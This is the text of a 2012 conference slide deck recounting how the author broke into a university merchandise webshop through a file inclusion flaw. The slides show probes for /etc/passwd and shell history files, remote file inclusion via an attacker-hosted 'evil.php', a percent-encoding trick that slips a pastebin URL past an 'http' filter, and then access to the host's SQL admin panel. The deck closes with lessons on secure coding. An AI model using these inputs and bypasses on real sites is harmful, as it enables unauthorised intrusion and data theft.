Oops! d e How I accidentally the k c a h University's Merchandising Shop Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 1
About UniBwM ● University of the German Federal Armed Forces, Munich ● ~3700 students in 2011 ● Corporate Design ● Sells shirts and stuff via student-driven webshop UniBwM Press Archive Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 2
About Me ● Student of Computer Aided Engineering ● Assistant at Network Security department ● find them holes! ● www.danrl.de Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 3
Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 4
static dynamic Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 5
http://www.uni-fashion.de/index.php?inhalt=artikel.php&... Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 6
A closer look That's a filename! http://www.uni-fashion.de/index.php?inhalt= artikel.php &... Filename is used to load dynamic content. Unfortunately, thats some bad kind of brainchild :( Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 7
Behind the scenes Webserver index.php artikel.php Visitor We call this technique File Inclusion Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 8
Escalating ● Let's try some other filenames ● /etc/passwd ● /var/log/messages ● /root/.bash_history Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 9
No success! (that's good from the security point of view) Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 10
Remote File Inclusion Webserver index.php artikel.php Attacker Let's create some harmless code to include! evil.php Evil Webserver Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 11
Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 12
Raw Code Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 13
Fail! No success! (that's good from the security point of view) Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 14
Difference makes a difference But wait... ...don't these error messages look different? What does that mean? Webserver Error Website Error Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 15
Questions ● Why failed the Remote File Inclusion attack? ● Why do local files generate other errors than remote files? Request “Filtering” index.php Webserver .htaccess “Rules” Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 16
No guts, no glory! =http is filtered Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 17
Fail! =http is filtered Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 18
Enconding issues ● In an URL one can write every character as %<HEX-ASCII> ● Same URL, different writing ● http://uni-fashion.de/index.php?a=bc ● http://uni-fashion.de/index.php?a=%61%62 ● Will the filter catch this one? ● http://uni-fashion.de/index.php?inhalt= %68 ttp://pastebin.com/raw.php?i=XqcNB6hz h as %<HEX-ASCII> Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 19
Bazinga! Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 20
Can you keep a secret? ● New code ● New URL ● Same game WTF? Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 21
A few no-brainers ● Lookup Hoster in WHOIS ● Find URL to Hosters SQL-Adminpanel ● Login in with correct password :) Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 22
Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 23
My work here is done... Might be useful :) Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 24
Lessons learned ● Always validate every user-based input! ● Seriously, do it! ● Do not fix bad code with filters, better repair your code! ● Never trust encoding! ● Use SSL for your SQL-Admin :) ● I can haz a free T-Shirt now? Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 25
Thanks! Questions? Dan Luedtke <mail@danrl.de> ● Thu, January 12, 2012 ● Slide 26
Recommend
More recommend